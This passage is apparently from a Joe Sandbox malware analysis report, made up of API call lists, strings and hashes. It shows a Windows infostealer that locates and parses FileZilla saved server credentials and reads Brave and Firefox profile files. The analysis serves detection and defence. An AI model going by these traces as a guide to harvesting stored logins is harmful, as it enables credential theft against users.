                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00B16AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B16B35
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16B9D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: ff3aec87674f11069bae1949850281170e2a834adacd882e02fdd058caa70d8d
                            • Instruction ID: 42d6ecd3883f87f1c74f589fd7b8f18f98e6ea807f3ff4cd1d050be068a8ef05
                            • Opcode Fuzzy Hash: ff3aec87674f11069bae1949850281170e2a834adacd882e02fdd058caa70d8d
                            • Instruction Fuzzy Hash: 44429F30A10716ABCB21ABB4DD89AAEBBF9EF44700F5444A4F805E7291DF74DD49CB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DBEF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B0DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC17
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B0DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC4C
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DC8F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B0DCD0
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B0DCF0
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B0DD0A
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B0DD1D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DD7B
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDA3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DDAF
                            • lstrlen.KERNEL32(?), ref: 00B0DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DE19
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DE6F
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DE7B
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DEBB
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DEE6
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DEF2
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFA5
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DFB1
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DFF4
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E022
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0E02E
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00B0E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00B0E0E7
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E11F
                            • lstrlen.KERNEL32(0187D280), ref: 00B0E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E19F
                            • lstrcat.KERNEL32(00000000), ref: 00B0E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00B0E1F9
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E22F
                            • lstrlen.KERNEL32(01878C38), ref: 00B0E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E261
                            • lstrcat.KERNEL32(00000000,01878C38), ref: 00B0E269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B0E988
                            • FindClose.KERNEL32(00000000), ref: 00B0E997
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 9a599599f176ee1730af7a45a3d0ae75105d3d297166d7cf713647744ed84282
                            • Instruction ID: cdfbe7993534bae23c4b6dae7c49521a5166c50bbb55ba3ccd2bb86c616e8993
                            • Opcode Fuzzy Hash: 9a599599f176ee1730af7a45a3d0ae75105d3d297166d7cf713647744ed84282
                            • Instruction Fuzzy Hash: EB525171A117169BCB21AFB8DC89AAE7FF9EF44300F0445A4F815E7291DB74DC498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B060FF
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06152
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06185
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B061B5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B061F0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B06233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 0c6d2e918249b818c4312b348128b17905a98e4de0287d824a361bf5cd8727fb
                            • Instruction ID: 996aa4d5362e73b93ece60be3ad72118366289f3a780b4e0fcc2633c54bd99ff
                            • Opcode Fuzzy Hash: 0c6d2e918249b818c4312b348128b17905a98e4de0287d824a361bf5cd8727fb
                            • Instruction Fuzzy Hash: B2522F71A107169BDB21EFB8DC49A9EBBF9EF44300F1445A4F805E7291DB74ED068BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16B9D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16BCD
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16BFD
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00B16C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B16C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B16C5A
                            • lstrlen.KERNEL32(00000000), ref: 00B16C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B16CE2
                            • lstrlen.KERNEL32(00000000), ref: 00B16CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00B16D6A
                            • lstrlen.KERNEL32(00000000), ref: 00B16D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B16DF2
                            • lstrlen.KERNEL32(00000000), ref: 00B16E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B16E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B16EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00B16EC9
                            • LocalFree.KERNEL32(00000000), ref: 00B16ED4
                            • lstrlen.KERNEL32(?), ref: 00B16F6E
                            • lstrlen.KERNEL32(?), ref: 00B16F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 322000499a5642531d71d6a58e4d256a898b7712c3df502018f941c83c6ba834
                            • Instruction ID: 590e346bd0aaa74061f44d91f7693079799a769c48395d03ac51ae8bc306e3eb
                            • Opcode Fuzzy Hash: 322000499a5642531d71d6a58e4d256a898b7712c3df502018f941c83c6ba834
                            • Instruction Fuzzy Hash: 7F02A231A01315ABCB11ABB8DD8DA9EBBF9EF44700F5444A4F806E7291DF74DD458BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14B7F
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B14B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BA7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B14BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B14BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: 9d3ea5d5e644a957efbacb5795f3cff0bb01e9e44b2ba414c7c6ad3ded871d98
                            • Instruction ID: 86b25e0c8d70ddbca38121d1f5e9ac5eb9532196c9ce323868317ac42c9fdc19
                            • Opcode Fuzzy Hash: 9d3ea5d5e644a957efbacb5795f3cff0bb01e9e44b2ba414c7c6ad3ded871d98
                            • Instruction Fuzzy Hash: 44921B70A01701CFDB25CF29D958AAAB7E5EF84714F5980E9E809DB3A1D771DC82CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B11291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B112BF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B112CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112E7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B112F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B1133A
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1135C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B11376
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B113AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B113D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B113E2
                            • lstrlen.KERNEL32(00B31794), ref: 00B113ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1140A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11416
                            • lstrlen.KERNEL32(?), ref: 00B11423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11443
                            • lstrcat.KERNEL32(00000000,?), ref: 00B11451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1147A
                            • StrCmpCA.SHLWAPI(?,0187D418), ref: 00B114A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B114E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11535
                            • StrCmpCA.SHLWAPI(?,0187DB70), ref: 00B11552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B115BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B115E4
                            • StrCmpCA.SHLWAPI(?,0187D2E0), ref: 00B11602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11633
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11685
                            • StrCmpCA.SHLWAPI(?,0187D3A0), ref: 00B116B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B116F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11745
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B117BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B117F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1181C
                            • FindClose.KERNEL32(00000000), ref: 00B1182B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 362bbe9c99f68e2ead534138b7790275c52f292d023646d8b3d374886afa8025
                            • Instruction ID: d6f6610ba00f9aa0e9d32f94dbdfc5a2cd6f6729146c7fbd3307e13be6ca1ea0
                            • Opcode Fuzzy Hash: 362bbe9c99f68e2ead534138b7790275c52f292d023646d8b3d374886afa8025
                            • Instruction Fuzzy Hash: 9A126271A117069BCB25EF7CD899AAE7BF8EF44300F4449A8F946D7290DB34DC458BA0
                            APIs
                            • wsprintfA.USER32 ref: 00B1CBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1CC13
                            • lstrcat.KERNEL32(?,?), ref: 00B1CC5F
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1CC71
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1CC8B
                            • wsprintfA.USER32 ref: 00B1CCB0
                            • PathMatchSpecA.SHLWAPI(?,01878C68), ref: 00B1CCE2
                            • CoInitialize.OLE32(00000000), ref: 00B1CCEE
                              • Part of subcall function 00B1CAE0: CoCreateInstance.COMBASE(00B2B110,00000000,00000001,00B2B100,?), ref: 00B1CB06
                              • Part of subcall function 00B1CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00B1CB46
                              • Part of subcall function 00B1CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00B1CBC9
                            • CoUninitialize.COMBASE ref: 00B1CD09
                            • lstrcat.KERNEL32(?,?), ref: 00B1CD2E
                            • lstrlen.KERNEL32(?), ref: 00B1CD3B
                            • StrCmpCA.SHLWAPI(?,00B2CFEC), ref: 00B1CD55
                            • wsprintfA.USER32 ref: 00B1CD7D
                            • wsprintfA.USER32 ref: 00B1CD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00B1CDB0
                            • wsprintfA.USER32 ref: 00B1CDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B1CDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B1CE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00B1CE28
                            • CloseHandle.KERNEL32(00000000), ref: 00B1CE33
                            • CloseHandle.KERNEL32(00000000), ref: 00B1CE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1CE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1CE94
                            • FindNextFileA.KERNEL32(?,?), ref: 00B1CF8D
                            • FindClose.KERNEL32(?), ref: 00B1CF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
